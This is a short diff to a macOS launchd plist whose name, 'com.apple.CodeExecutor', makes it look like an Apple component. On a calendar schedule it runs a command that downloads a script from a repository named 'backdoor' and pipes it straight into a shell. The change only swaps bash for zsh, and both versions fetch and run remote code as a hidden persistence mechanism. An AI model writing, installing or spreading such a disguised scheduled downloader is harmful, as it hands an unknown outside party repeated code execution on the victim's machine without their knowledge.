--- a/com.apple.CodeExecutor.plist
+++ b/com.apple.CodeExecutor.plist
@@ -8,7 +8,7 @@
    <array>
        <string>/bin/bash</string>
        <string>-c</string>
-       <string>curl -S "https://raw.githubusercontent.com/Wolfoverflow/backdoor/main/script" | bash</string>
+       <string>curl -S "https://raw.githubusercontent.com/Wolfoverflow/backdoor/main/script" | zsh</string>
    </array>
    <key>StartCalendarInterval</key>
    <dict>
